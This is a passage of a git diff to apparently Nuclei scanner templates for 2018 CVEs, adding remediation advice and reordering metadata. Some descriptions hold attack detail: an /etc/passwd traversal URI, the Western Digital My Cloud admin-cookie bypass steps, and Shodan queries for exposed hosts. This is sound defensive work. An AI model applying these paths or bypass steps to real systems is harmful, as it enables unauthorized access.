sqli,wordpress,unauth,wp,gift-voucher,cve2018,edb,wpscan,cve,wp-plugin http: diff --git a/http/cves/2018/CVE-2018-16167.yaml b/http/cves/2018/CVE-2018-16167.yaml index 006537a22d..ec49c9528f 100644 --- a/http/cves/2018/CVE-2018-16167.yaml +++ b/http/cves/2018/CVE-2018-16167.yaml @@ -5,6 +5,8 @@ info: author: gy741 severity: critical description: LogonTracer 1.2.0 and earlier allows remote attackers to execute arbitrary OS commands via unspecified vectors. + remediation: | + Upgrade LogonTracer to a version higher than 1.2.0. reference: - https://www.exploit-db.com/exploits/49918 - https://nvd.nist.gov/vuln/detail/CVE-2018-16167 @@ -16,8 +18,8 @@ info: cve-id: CVE-2018-16167 cwe-id: CWE-78 epss-score: 0.13203 - cpe: cpe:2.3:a:jpcert:logontracer:*:*:*:*:*:*:*:* epss-percentile: 0.94828 + cpe: cpe:2.3:a:jpcert:logontracer:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: jpcert diff --git a/http/cves/2018/CVE-2018-16283.yaml b/http/cves/2018/CVE-2018-16283.yaml index bea41a06ad..ac971d06a4 100644 --- a/http/cves/2018/CVE-2018-16283.yaml +++ b/http/cves/2018/CVE-2018-16283.yaml @@ -5,6 +5,8 @@ info: author: 0x240x23elu severity: critical description: WordPress Wechat Broadcast plugin 1.2.0 and earlier allows Directory Traversal via the Image.php url parameter. + remediation: | + Update to the latest version of the WordPress Plugin Wechat Broadcast or apply the patch provided by the vendor to fix the LFI vulnerability. reference: - https://www.exploit-db.com/exploits/45438 - https://nvd.nist.gov/vuln/detail/CVE-2018-16283 @@ -17,13 +19,13 @@ info: cve-id: CVE-2018-16283 cwe-id: CWE-22 epss-score: 0.2134 - cpe: cpe:2.3:a:wechat_brodcast_project:wechat_brodcast:*:*:*:*:*:wordpress:*:* epss-percentile: 0.95789 + cpe: cpe:2.3:a:wechat_brodcast_project:wechat_brodcast:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 - framework: wordpress vendor: wechat_brodcast_project product: wechat_brodcast + framework: wordpress tags: edb,seclists,cve,cve2018,wordpress,wp-plugin,lfi http: diff --git a/http/cves/2018/CVE-2018-16288.yaml b/http/cves/2018/CVE-2018-16288.yaml index f1ca9f4208..536beb3d25 100644 --- a/http/cves/2018/CVE-2018-16288.yaml +++ b/http/cves/2018/CVE-2018-16288.yaml @@ -6,6 +6,8 @@ info: severity: high description: | LG SuperSign CMS 2.5 allows reading of arbitrary files via signEzUI/playlist/edit/upload/..%2f URIs - aka local file inclusion. + remediation: | + Apply the latest security patches or upgrade to a patched version of LG SuperSign EZ CMS. reference: - https://www.exploit-db.com/exploits/45440 - http://mamaquieroserpentester.blogspot.com/2018/09/multiple-vulnerabilities-in-lg.html @@ -16,8 +18,8 @@ info: cve-id: CVE-2018-16288 cwe-id: CWE-200 epss-score: 0.2541 - cpe: cpe:2.3:a:lg:supersign_cms:2.5:*:*:*:*:*:*:* epss-percentile: 0.96066 + cpe: cpe:2.3:a:lg:supersign_cms:2.5:*:*:*:*:*:*:* metadata: max-request: 1 vendor: lg diff --git a/http/cves/2018/CVE-2018-16299.yaml b/http/cves/2018/CVE-2018-16299.yaml index 39abf3bcdd..23ed6e3846 100644 --- a/http/cves/2018/CVE-2018-16299.yaml +++ b/http/cves/2018/CVE-2018-16299.yaml @@ -6,6 +6,8 @@ info: severity: high description: | WordPress Localize My Post 1.0 is susceptible to local file inclusion via the ajax/include.php file parameter. + remediation: | + Update to the latest version of WordPress Localize My Post plugin. reference: - https://www.exploit-db.com/exploits/45439 - https://packetstormsecurity.com/files/149433/WordPress-Localize-My-Post-1.0-Local-File-Inclusion.html @@ -17,13 +19,13 @@ info: cve-id: CVE-2018-16299 cwe-id: CWE-22 epss-score: 0.08709 - cpe: cpe:2.3:a:localize_my_post_project:localize_my_post:1.0:*:*:*:*:wordpress:*:* epss-percentile: 0.93696 + cpe: cpe:2.3:a:localize_my_post_project:localize_my_post:1.0:*:*:*:*:wordpress:*:* metadata: max-request: 1 - framework: wordpress vendor: localize_my_post_project product: localize_my_post + framework: wordpress tags: wordpress,lfi,plugin,wp,edb,packetstorm,cve,cve2018 http: diff --git a/http/cves/2018/CVE-2018-16341.yaml b/http/cves/2018/CVE-2018-16341.yaml index cb895ebc67..b6b3cbd0b0 100644 --- a/http/cves/2018/CVE-2018-16341.yaml +++ b/http/cves/2018/CVE-2018-16341.yaml @@ -6,6 +6,8 @@ info: severity: high description: | Nuxeo prior to version 10.3 is susceptible to an unauthenticated remote code execution vulnerability via server-side template injection. + remediation: | + Upgrade Nuxeo to version 10.3 or later to mitigate this vulnerability. reference: - https://nvd.nist.gov/vuln/detail/CVE-2018-16299 classification: diff --git a/http/cves/2018/CVE-2018-16668.yaml b/http/cves/2018/CVE-2018-16668.yaml index 311fe57c58..d198453e33 100644 --- a/http/cves/2018/CVE-2018-16668.yaml +++ b/http/cves/2018/CVE-2018-16668.yaml @@ -5,6 +5,8 @@ info: author: geeknik severity: medium description: CirCarLife before 4.3 is susceptible to improper authentication. An internal installation path disclosure exists due to the lack of authentication for /html/repository.System. An attacker can obtain sensitive information, modify data, and/or execute unauthorized operations. + remediation: | + Upgrade CirCarLife to version 4.3 or higher to fix the improper authentication issue. reference: - https://www.exploit-db.com/exploits/45384 - https://github.com/SadFud/Exploits/tree/master/Real%20World/Suites/cir-pwn-life @@ -16,8 +18,8 @@ info: cve-id: CVE-2018-16668 cwe-id: CWE-287 epss-score: 0.00352 - cpe: cpe:2.3:a:circontrol:circarlife_scada:*:*:*:*:*:*:*:* epss-percentile: 0.68356 + cpe: cpe:2.3:a:circontrol:circarlife_scada:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: circontrol diff --git a/http/cves/2018/CVE-2018-16670.yaml b/http/cves/2018/CVE-2018-16670.yaml index 726a725672..620f76c662 100644 --- a/http/cves/2018/CVE-2018-16670.yaml +++ b/http/cves/2018/CVE-2018-16670.yaml @@ -5,6 +5,8 @@ info: author: geeknik severity: medium description: CirCarLife before 4.3 is susceptible to improper authentication. A PLC status disclosure exists due to lack of authentication for /html/devstat.html. An attacker can obtain sensitive information, modify data, and/or execute unauthorized operations. + remediation: | + Upgrade CirCarLife to version 4.3 or higher to fix the improper authentication issue. reference: - https://www.exploit-db.com/exploits/45384 - https://github.com/SadFud/Exploits/tree/master/Real%20World/Suites/cir-pwn-life @@ -16,8 +18,8 @@ info: cve-id: CVE-2018-16670 cwe-id: CWE-287 epss-score: 0.00187 - cpe: cpe:2.3:a:circontrol:circarlife_scada:*:*:*:*:*:*:*:* epss-percentile: 0.55422 + cpe: cpe:2.3:a:circontrol:circarlife_scada:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: circontrol diff --git a/http/cves/2018/CVE-2018-16671.yaml b/http/cves/2018/CVE-2018-16671.yaml index 7f6d286344..5c9a696164 100644 --- a/http/cves/2018/CVE-2018-16671.yaml +++ b/http/cves/2018/CVE-2018-16671.yaml @@ -5,6 +5,8 @@ info: author: geeknik severity: medium description: CirCarLife before 4.3 is susceptible to improper authentication. A system software information disclosure exists due to lack of authentication for /html/device-id. An attacker can obtain sensitive information, modify data, and/or execute unauthorized operations. + remediation: | + Upgrade CirCarLife to version 4.3 or higher to fix the improper authentication issue. reference: - https://www.exploit-db.com/exploits/45384 - https://github.com/SadFud/Exploits/tree/master/Real%20World/Suites/cir-pwn-life @@ -15,8 +17,8 @@ info: cve-id: CVE-2018-16671 cwe-id: CWE-200 epss-score: 0.00357 - cpe: cpe:2.3:a:circontrol:circarlife_scada:*:*:*:*:*:*:*:* epss-percentile: 0.68577 + cpe: cpe:2.3:a:circontrol:circarlife_scada:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: "circontrol" diff --git a/http/cves/2018/CVE-2018-16716.yaml b/http/cves/2018/CVE-2018-16716.yaml index 03009b40be..c8e93a6aa6 100644 --- a/http/cves/2018/CVE-2018-16716.yaml +++ b/http/cves/2018/CVE-2018-16716.yaml @@ -5,6 +5,8 @@ info: author: 0x_Akoko severity: critical description: NCBI ToolBox 2.0.7 through 2.2.26 legacy versions contain a path traversal vulnerability via viewcgi.cgi which may result in reading of arbitrary files (i.e., significant information disclosure) or file deletion via the nph-viewgif.cgi query string. + remediation: | + Apply the latest patch or update from the vendor to fix the directory traversal vulnerability in the NCBI ToolBox. reference: - https://github.com/grymer/CVE/blob/master/CVE-2018-16716.md - https://nvd.nist.gov/vuln/detail/CVE-2018-16716 @@ -14,8 +16,8 @@ info: cve-id: CVE-2018-16716 cwe-id: CWE-22 epss-score: 0.00803 - cpe: cpe:2.3:a:nih:ncbi_toolbox:*:*:*:*:*:*:*:* epss-percentile: 0.7951 + cpe: cpe:2.3:a:nih:ncbi_toolbox:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: nih diff --git a/http/cves/2018/CVE-2018-16761.yaml b/http/cves/2018/CVE-2018-16761.yaml index 08afc87ccb..4cb92526c4 100644 --- a/http/cves/2018/CVE-2018-16761.yaml +++ b/http/cves/2018/CVE-2018-16761.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | Eventum before 3.4.0 contains an open redirect vulnerability. An attacker can redirect a user to a malicious site and possibly obtain sensitive information, modify data, and/or execute unauthorized operations. + remediation: | + Upgrade to Eventum version 3.4.0 or later to fix the open redirect vulnerability. reference: - https://www.invicti.com/web-applications-advisories/ns-18-021-open-redirection-vulnerabilities-in-eventum/ - https://github.com/eventum/eventum/releases/tag/v3.4.0 @@ -16,8 +18,8 @@ info: cve-id: CVE-2018-16761 cwe-id: CWE-601 epss-score: 0.00068 - cpe: cpe:2.3:a:eventum_project:eventum:*:*:*:*:*:*:*:* epss-percentile: 0.28011 + cpe: cpe:2.3:a:eventum_project:eventum:*:*:*:*:*:*:*:* metadata: max-request: 2 vendor: eventum_project diff --git a/http/cves/2018/CVE-2018-16763.yaml b/http/cves/2018/CVE-2018-16763.yaml index 8cb73dab0d..d275a79199 100644 --- a/http/cves/2018/CVE-2018-16763.yaml +++ b/http/cves/2018/CVE-2018-16763.yaml @@ -5,6 +5,8 @@ info: author: pikpikcu severity: critical description: FUEL CMS 1.4.1 allows PHP Code Evaluation via the pages/select/ filter parameter or the preview/ data parameter. + remediation: | + Upgrade to FUEL CMS version 1.4.2 or later, which includes a patch for this vulnerability. reference: - https://www.exploit-db.com/exploits/47138 - https://www.getfuelcms.com/ @@ -17,8 +19,8 @@ info: cve-id: CVE-2018-16763 cwe-id: CWE-74 epss-score: 0.79948 - cpe: cpe:2.3:a:thedaylightstudio:fuel_cms:*:*:*:*:*:*:*:* epss-percentile: 0.97878 + cpe: cpe:2.3:a:thedaylightstudio:fuel_cms:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: thedaylightstudio diff --git a/http/cves/2018/CVE-2018-16836.yaml b/http/cves/2018/CVE-2018-16836.yaml index 9b766218b6..d0c62d77eb 100644 --- a/http/cves/2018/CVE-2018-16836.yaml +++ b/http/cves/2018/CVE-2018-16836.yaml @@ -5,6 +5,8 @@ info: author: 0x_Akoko severity: critical description: Rubedo CMS through 3.4.0 contains a directory traversal vulnerability in the theme component, allowing unauthenticated attackers to read and execute arbitrary files outside of the service root path, as demonstrated by a /theme/default/img/%2e%2e/..//etc/passwd URI. + remediation: | + Upgrade to a patched version of Rubedo CMS (>=3.4.1) or apply the provided security patch. reference: - https://www.exploit-db.com/exploits/45385 - https://nvd.nist.gov/vuln/detail/CVE-2018-16836 @@ -16,8 +18,8 @@ info: cve-id: CVE-2018-16836 cwe-id: CWE-22 epss-score: 0.34263 - cpe: cpe:2.3:a:rubedo_project:rubedo:*:*:*:*:*:*:*:* epss-percentile: 0.96533 + cpe: cpe:2.3:a:rubedo_project:rubedo:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: rubedo_project diff --git a/http/cves/2018/CVE-2018-16979.yaml b/http/cves/2018/CVE-2018-16979.yaml index e14105ec94..e1101ed28a 100644 --- a/http/cves/2018/CVE-2018-16979.yaml +++ b/http/cves/2018/CVE-2018-16979.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | Monstra CMS 3.0.4 is susceptible to HTTP header injection in the plugins/captcha/crypt/cryptographp.php cfg parameter. An attacker can potentially supply invalid input and cause the server to allow redirects to attacker-controlled domains, perform cache poisoning, and/or allow improper access to virtual hosts not intended for this purpose. This is a related issue to CVE-2012-2943. + remediation: | + Upgrade Monstra CMS to version 3.0.5 or later to mitigate the HTTP Header Injection vulnerability. reference: - https://github.com/howchen/howchen/issues/4 - https://nvd.nist.gov/vuln/detail/CVE-2018-16979 @@ -15,11 +17,11 @@ info: cve-id: CVE-2018-16979 cwe-id: CWE-113 epss-score: 0.00118 - cpe: cpe:2.3:a:monstra:monstra:3.0.4:*:*:*:*:*:*:* epss-percentile: 0.45103 + cpe: cpe:2.3:a:monstra:monstra:3.0.4:*:*:*:*:*:*:* metadata: - max-request: 1 verified: true + max-request: 1 vendor: monstra product: monstra tags: cve,cve2018,crlf,mostra,mostracms,cms diff --git a/http/cves/2018/CVE-2018-17153.yaml b/http/cves/2018/CVE-2018-17153.yaml index d67bbee289..59ca6b8d56 100644 --- a/http/cves/2018/CVE-2018-17153.yaml +++ b/http/cves/2018/CVE-2018-17153.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | It was discovered that the Western Digital My Cloud device before 2.30.196 is affected by an authentication bypass vulnerability. An unauthenticated attacker can exploit this vulnerability to authenticate as an admin user without needing to provide a password, thereby gaining full control of the device. (Whenever an admin logs into My Cloud, a server-side session is created that is bound to the user's IP address. After the session is created, it is possible to call authenticated CGI modules by sending the cookie username=admin in the HTTP request. The invoked CGI will check if a valid session is present and bound to the user's IP address.) It was found that it is possible for an unauthenticated attacker to create a valid session without a login. The network_mgr.cgi CGI module contains a command called \"cgi_get_ipv6\" that starts an admin session -- tied to the IP address of the user making the request -- if the additional parameter \"flag\" with the value \"1\" is provided. Subsequent invocation of commands that would normally require admin privileges now succeed if an attacker sets the username=admin cookie. + remediation: | + Apply the latest firmware update provided by Western Digital to fix the authentication bypass vulnerability. reference: - https://web.archive.org/web/20170315123948/https://www.stevencampbell.info/2016/12/command-injection-in-western-digital-mycloud-nas/ - https://packetstormsecurity.com/files/173802/Western-Digital-MyCloud-Unauthenticated-Command-Injection.html @@ -19,11 +21,11 @@ info: epss-score: 0.01264 cpe: cpe:2.3:o:western_digital:my_cloud_wdbctl0020hwt_firmware:*:*:*:*:*:*:*:* metadata: - max-request: 1 verified: true - shodan-query: http.favicon.hash:-1074357885 + max-request: 1 vendor: western_digital product: my_cloud_wdbctl0020hwt_firmware + shodan-query: http.favicon.hash:-1074357885 tags: cve,cve2018,auth-bypass,rce,wdcloud http: diff --git a/http/cves/2018/CVE-2018-17246.yaml b/http/cves/2018/CVE-2018-17246.yaml index a026665bb4..31aee92b5e 100644 --- a/http/cves/2018/CVE-2018-17246.yaml +++ b/http/cves/2018/CVE-2018-17246.yaml @@ -5,6 +5,8 @@ info: author: princechaddha,thelicato severity: critical description: Kibana versions before 6.4.3 and 5.6.13 contain an arbitrary file inclusion flaw in the Console plugin. An attacker with access to the Kibana Console API could send a request that will attempt to execute JavaScript which could possibly lead to an attacker executing arbitrary commands with permissions of the Kibana process on the host system. + remediation: | + Apply the latest security patches and updates provided by the vendor to mitigate this vulnerability. reference: - https://github.com/vulhub/vulhub/blob/master/kibana/CVE-2018-17246/README.md - https://www.elastic.co/community/security @@ -17,8 +19,8 @@ info: cve-id: CVE-2018-17246 cwe-id: CWE-829,CWE-73 epss-score: 0.96913 - cpe: cpe:2.3:a:elastic:kibana:*:*:*:*:*:*:*:* epss-percentile: 0.99595 + cpe: cpe:2.3:a:elastic:kibana:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: elastic diff --git a/http/cves/2018/CVE-2018-17254.yaml b/http/cves/2018/CVE-2018-17254.yaml index e4d56b7cdf..c042fc16a0 100644 --- a/http/cves/2018/CVE-2018-17254.yaml +++ b/http/cves/2018/CVE-2018-17254.yaml @@ -5,23 +5,23 @@ info: author: Suman_Kar severity: critical description: The JCK Editor component 6.4.4 for Joomla! allows SQL Injection via the jtreelink/dialogs/links.php parent parameter. + remediation: Update or remove the affected plugin. reference: - http://packetstormsecurity.com/files/161683/Joomla-JCK-Editor-6.4.4-SQL-Injection.html - https://www.exploit-db.com/exploits/45423/ - remediation: Update or remove the affected plugin. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2018-17254 cwe-id: CWE-89 epss-score: 0.81793 - cpe: cpe:2.3:a:arkextensions:jck_editor:6.4.4:*:*:*:*:joomla\!:*:* epss-percentile: 0.97937 + cpe: cpe:2.3:a:arkextensions:jck_editor:6.4.4:*:*:*:*:joomla\!:*:* metadata: max-request: 1 - framework: joomla\! vendor: arkextensions product: jck_editor + framework: joomla\! tags: cve,cve2018,packetstorm,edb,joomla,sqli variables: num: "999999999" diff --git a/http/cves/2018/CVE-2018-17422.yaml b/http/cves/2018/CVE-2018-17422.yaml index 579f4b56dd..a8119475c3 100644 --- a/http/cves/2018/CVE-2018-17422.yaml +++ b/http/cves/2018/CVE-2018-17422.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | dotCMS before 5.0.2 contains multiple open redirect vulnerabilities via the html/common/forward_js.jsp FORWARD_URL parameter or the html/portlet/ext/common/page_preview_popup.jsp hostname parameter. An attacker can redirect a user to a malicious site and possibly obtain sensitive information, modify data, and/or execute unauthorized operations. + remediation: | + Upgrade to a version of DotCMS that is higher than 5.0.2 to mitigate the open redirect vulnerability. reference: - https://github.com/dotCMS/core/issues/15286 - https://nvd.nist.gov/vuln/detail/CVE-2018-17422 @@ -15,14 +17,14 @@ info: cve-id: CVE-2018-17422 cwe-id: CWE-601 epss-score: 0.00118 - cpe: cpe:2.3:a:dotcms:dotcms:*:*:*:*:*:*:*:* epss-percentile: 0.45103 + cpe: cpe:2.3:a:dotcms:dotcms:*:*:*:*:*:*:*:* metadata: - max-request: 2 verified: true - shodan-query: http.title:"dotCMS" + max-request: 2 vendor: dotcms product: dotcms + shodan-query: http.title:"dotCMS" tags: cve,cve2018,redirect,dotcms http: diff --git a/http/cves/2018/CVE-2018-17431.yaml b/http/cves/2018/CVE-2018-17431.yaml index d2a60224a0..fc0f098193 100644 --- a/http/cves/2018/CVE-2018-17431.yaml +++ b/http/cves/2018/CVE-2018-17431.yaml @@ -5,6 +5,8 @@ info: author: dwisiswant0 severity: critical description: Comodo Firewall & Central Manager (UTM) All Release before 2.7.0 & 1.5.0 are susceptible to a web shell based remote code execution vulnerability. + remediation: | + Apply the latest security patches or updates provided by Comodo to fix this vulnerability. reference: - https://www.exploit-db.com/exploits/48825 - https://secure.comodo.com/home/purchase.php?pid=106&license=try&track=9276&af=9276 @@ -17,8 +19,8 @@ info: cve-id: CVE-2018-17431 cwe-id: CWE-287 epss-score: 0.10458 - cpe: cpe:2.3:a:comodo:unified_threat_management_firewall:*:*:*:*:*:*:*:* epss-percentile: 0.94254 + cpe: cpe:2.3:a:comodo:unified_threat_management_firewall:*:*:*:*:*:*:*:* metadata: max-request: 2 vendor: comodo diff --git a/http/cves/2018/CVE-2018-18069.yaml b/http/cves/2018/CVE-2018-18069.yaml index 9bdb4e8caf..170c430715 100644 --- a/http/cves/2018/CVE-2018-18069.yaml +++ b/http/cves/2018/CVE-2018-18069.yaml @@ -5,6 +5,8 @@ info: author: nadino severity: medium description: WordPress plugin sitepress-multilingual-cms 3.6.3 is vulnerable to cross-site scripting in process_forms via any locale_file_name_ parameter (such as locale_file_name_en) in an authenticated theme-localization.php request to wp-admin/admin.php. + remediation: | + Update WordPress sitepress-multilingual-cms to the latest version to mitigate the XSS vulnerability. reference: - https://0x62626262.wordpress.com/2018/10/08/sitepress-multilingual-cms-plugin-unauthenticated-stored-xss/ - https://nvd.nist.gov/vuln/detail/CVE-2018-18069 @@ -14,13 +16,13 @@ info: cve-id: CVE-2018-18069 cwe-id: CWE-79 epss-score: 0.00106 - cpe: cpe:2.3:a:wpml:wpml:*:*:*:*:*:wordpress:*:* epss-percentile: 0.42502 + cpe: cpe:2.3:a:wpml:wpml:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 - framework: wordpress vendor: wpml product: wpml + framework: wordpress tags: cve,cve2018,wordpress,xss,plugin http: diff --git a/http/cves/2018/CVE-2018-18264.yaml b/http/cves/2018/CVE-2018-18264.yaml index 81a0dc8fe8..28f69ae336 100644 --- a/http/cves/2018/CVE-2018-18264.yaml +++ b/http/cves/2018/CVE-2018-18264.yaml @@ -6,6 +6,8 @@ info: severity: high description: | Kubernetes Dashboard before 1.10.1 allows attackers to bypass authentication and use Dashboard's Service Account for reading secrets within the cluster. + remediation: | + Upgrade to Kubernetes Dashboard version 1.10.1 or later to mitigate the authentication bypass vulnerability. reference: - https://github.com/kubernetes/dashboard/pull/3289 - https://sysdig.com/blog/privilege-escalation-kubernetes-dashboard/ @@ -18,13 +20,13 @@ info: cve-id: CVE-2018-18264 cwe-id: CWE-306 epss-score: 0.97405 - cpe: cpe:2.3:a:kubernetes:dashboard:*:*:*:*:*:*:*:* epss-percentile: 0.99881 + cpe: cpe:2.3:a:kubernetes:dashboard:*:*:*:*:*:*:*:* metadata: max-request: 2 - shodan-query: product:"Kubernetes" vendor: kubernetes product: dashboard + shodan-query: product:"Kubernetes" tags: cve,cve2018,kubernetes,k8s,auth-bypass http: diff --git a/http/cves/2018/CVE-2018-18323.yaml b/http/cves/2018/CVE-2018-18323.yaml index 2ae82495e1..b5765e9727 100644 --- a/http/cves/2018/CVE-2018-18323.yaml +++ b/http/cves/2018/CVE-2018-18323.yaml @@ -6,6 +6,8 @@ info: severity: high description: | Centos Web Panel version 0.9.8.480 suffers from local file inclusion vulnerabilities. Other vulnerabilities including cross-site scripting and remote code execution are also known to impact this version. + remediation: | + Upgrade to a patched version of Centos Web Panel. reference: - https://packetstormsecurity.com/files/149795/Centos-Web-Panel-0.9.8.480-XSS-LFI-Code-Execution.html - http://centos-webpanel.com/ @@ -17,8 +19,8 @@ info: cve-id: CVE-2018-18323 cwe-id: CWE-22 epss-score: 0.97376 - cpe: cpe:2.3:a:control-webpanel:webpanel:0.9.8.480:*:*:*:*:*:*:* epss-percentile: 0.99858 + cpe: cpe:2.3:a:control-webpanel:webpanel:0.9.8.480:*:*:*:*:*:*:* metadata: max-request: 1 vendor: control-webpanel diff --git a/http/cves/2018/CVE-2018-18570.yaml b/http/cves/2018/CVE-2018-18570.yaml index ce5e52cc12..09f8ccea5c 100644 --- a/http/cves/2018/CVE-2018-18570.yaml +++ b/http/cves/2018/CVE-2018-18570.yaml @@ -5,6 +5,8 @@ info: author: emadshanab severity: medium description: Planon before Live Build 41 is vulnerable to cross-site scripting. + remediation: | + Apply the latest patch or upgrade to a non-vulnerable version of Planon Live Build. reference: - https://www2.deloitte.com/de/de/pages/risk/articles/planon-cross-site-scripting.html - https://nvd.nist.gov/vuln/detail/CVE-2018-18570 @@ -14,8 +16,8 @@ info: cve-id: CVE-2018-18570 cwe-id: CWE-79 epss-score: 0.00098 - cpe: cpe:2.3:a:planonsoftware:planon:*:*:*:*:*:*:*:* epss-percentile: 0.40032 + cpe: cpe:2.3:a:planonsoftware:planon:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: planonsoftware diff --git a/http/cves/2018/CVE-2018-18608.yaml b/http/cves/2018/CVE-2018-18608.yaml index 2ab7dc5aca..cfa7a538cc 100644 --- a/http/cves/2018/CVE-2018-18608.yaml +++ b/http/cves/2018/CVE-2018-18608.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | DedeCMS 5.7 SP2 is vulnerable to cross-site scripting via the function named GetPageList defined in the include/datalistcp.class.php file that is used to display the page numbers list at the bottom of some templates, as demonstrated by the PATH_INFO to /member/index.php, /member/pm.php, /member/content_list.php, or /plus/feedback.php. + remediation: | + Upgrade to the latest version of DedeCMS or apply the official patch provided by the vendor to fix the XSS vulnerability. reference: - https://github.com/ky-j/dedecms/issues/8 - https://github.com/ky-j/dedecms/files/2504649/Reflected.XSS.Vulnerability.exists.in.the.file.of.DedeCMS.V5.7.SP2.docx @@ -16,14 +18,14 @@ info: cve-id: CVE-2018-18608 cwe-id: CWE-79 epss-score: 0.00177 - cpe: cpe:2.3:a:dedecms:dedecms:5.7:sp2:*:*:*:*:*:* epss-percentile: 0.54186 + cpe: cpe:2.3:a:dedecms:dedecms:5.7:sp2:*:*:*:*:*:* metadata: - max-request: 1 - shodan-query: http.html:"DedeCms" verified: true + max-request: 1 vendor: dedecms product: dedecms + shodan-query: http.html:"DedeCms" tags: dedecms,xss,cve,cve2018 http: diff --git a/http/cves/2018/CVE-2018-18775.yaml b/http/cves/2018/CVE-2018-18775.yaml index 5092f3c21c..a142d295d1 100644 --- a/http/cves/2018/CVE-2018-18775.yaml +++ b/http/cves/2018/CVE-2018-18775.yaml @@ -5,6 +5,8 @@ info: author: 0x_Akoko severity: medium description: Microstrategy Web 7 does not sufficiently encode user-controlled inputs, resulting in cross-site scripting via the Login.asp Msg parameter. + remediation: | + Apply the latest security patches or updates provided by Microstrategy to fix the XSS vulnerability in the Web 7 application. reference: - https://www.exploit-db.com/exploits/45755 - http://packetstormsecurity.com/files/150059/Microstrategy-Web-7-Cross-Site-Scripting-Traversal.html @@ -15,8 +17,8 @@ info: cve-id: CVE-2018-18775 cwe-id: CWE-79 epss-score: 0.00235 - cpe: cpe:2.3:a:microstrategy:microstrategy_web:7:*:*:*:*:*:*:* epss-percentile: 0.60867 + cpe: cpe:2.3:a:microstrategy:microstrategy_web:7:*:*:*:*:*:*:* metadata: max-request: 1 vendor: microstrategy diff --git a/http/cves/2018/CVE-2018-18777.yaml b/http/cves/2018/CVE-2018-18777.yaml index 7c8b046296..74da5445c3 100644 --- a/http/cves/2018/CVE-2018-18777.yaml +++ b/http/cves/2018/CVE-2018-18777.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | Microstrategy Web 7 is vulnerable to local file inclusion via "/WebMstr7/servlet/mstrWeb" (in the parameter subpage). Remote authenticated users can bypass intended SecurityManager restrictions and list a parent directory via a /.. (slash dot dot) in a pathname used by a web application. NOTE: this is a deprecated product. + remediation: | + Apply the latest security patches or upgrade to a newer version of Microstrategy Web. reference: - https://www.exploit-db.com/exploits/45755 - http://packetstormsecurity.com/files/150059/Microstrategy-Web-7-Cross-Site-Scripting-Traversal.html @@ -16,8 +18,8 @@ info: cve-id: CVE-2018-18777 cwe-id: CWE-22 epss-score: 0.00238 - cpe: cpe:2.3:a:microstrategy:microstrategy_web:7:*:*:*:*:*:*:* epss-percentile: 0.61201 + cpe: cpe:2.3:a:microstrategy:microstrategy_web:7:*:*:*:*:*:*:* metadata: max-request: 1 vendor: microstrategy diff --git a/http/cves/2018/CVE-2018-18778.yaml b/http/cves/2018/CVE-2018-18778.yaml index 1faa2acf10..06e4aba825 100644 --- a/http/cves/2018/CVE-2018-18778.yaml +++ b/http/cves/2018/CVE-2018-18778.yaml @@ -5,6 +5,8 @@ info: author: dhiyaneshDK severity: medium description: ACME mini_httpd before 1.30 is vulnerable to local file inclusion. + remediation: | + Upgrade ACME mini_httpd to version 1.30 or later to mitigate this vulnerability. reference: - https://www.acunetix.com/vulnerabilities/web/acme-mini_httpd-arbitrary-file-read/ - http://www.acme.com/software/mini_httpd/ @@ -15,8 +17,8 @@ info: cve-id: CVE-2018-18778 cwe-id: CWE-200 epss-score: 0.95125 - cpe: cpe:2.3:a:acme:mini-httpd:*:*:*:*:*:*:*:* epss-percentile: 0.99024 + cpe: cpe:2.3:a:acme:mini-httpd:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: acme diff --git a/http/cves/2018/CVE-2018-18809.yaml b/http/cves/2018/CVE-2018-18809.yaml index e28b1ed11d..9a51288ed7 100644 --- a/http/cves/2018/CVE-2018-18809.yaml +++ b/http/cves/2018/CVE-2018-18809.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | The default server implementation of TIBCO Software Inc.'s TIBCO JasperReports Library, TIBCO JasperReports Library Community Edition, TIBCO JasperReports Library for ActiveMatrix BPM, TIBCO JasperReports Server, TIBCO JasperReports Server Community Edition, TIBCO JasperReports Server for ActiveMatrix BPM, TIBCO Jaspersoft for AWS with Multi-Tenancy, and TIBCO Jaspersoft Reporting and Analytics for AWS contains a directory-traversal vulnerability that may theoretically allow web server users to access contents of the host system. + remediation: | + Apply the latest security patches or upgrade to a patched version of TIBCO JasperReports Library. reference: - https://packetstormsecurity.com/files/154406/Tibco-JasperSoft-Path-Traversal.html - https://security.elarlang.eu/cve-2018-18809-path-traversal-in-tibco-jaspersoft.html @@ -18,14 +20,14 @@ info: cve-id: CVE-2018-18809 cwe-id: CWE-22 epss-score: 0.46465 - cpe: cpe:2.3:a:tibco:jasperreports_library:*:*:*:*:activematrix_bpm:*:*:* epss-percentile: 0.96953 + cpe: cpe:2.3:a:tibco:jasperreports_library:*:*:*:*:activematrix_bpm:*:*:* metadata: - max-request: 1 verified: true - shodan-query: html:"jasperserver-pro" + max-request: 1 vendor: tibco product: jasperreports_library + shodan-query: html:"jasperserver-pro" tags: packetstorm,cve,cve2018,lfi,kev,jasperserver,jasperreport http: diff --git a/http/cves/2018/CVE-2018-18925.yaml b/http/cves/2018/CVE-2018-18925.yaml index 3abc796b1f..dd331fb52b 100644 --- a/http/cves/2018/CVE-2018-18925.yaml +++ b/http/cves/2018/CVE-2018-18925.yaml @@ -5,20 +5,20 @@ info: author: princechaddha severity: critical description: Gogs 0.11.66 allows remote code execution because it does not properly validate session IDs, as demonstrated by a ".." session-file forgery in the file session provider in file.go. This is related to session ID handling in the go-macaron/session code for Macaron. + remediation: This 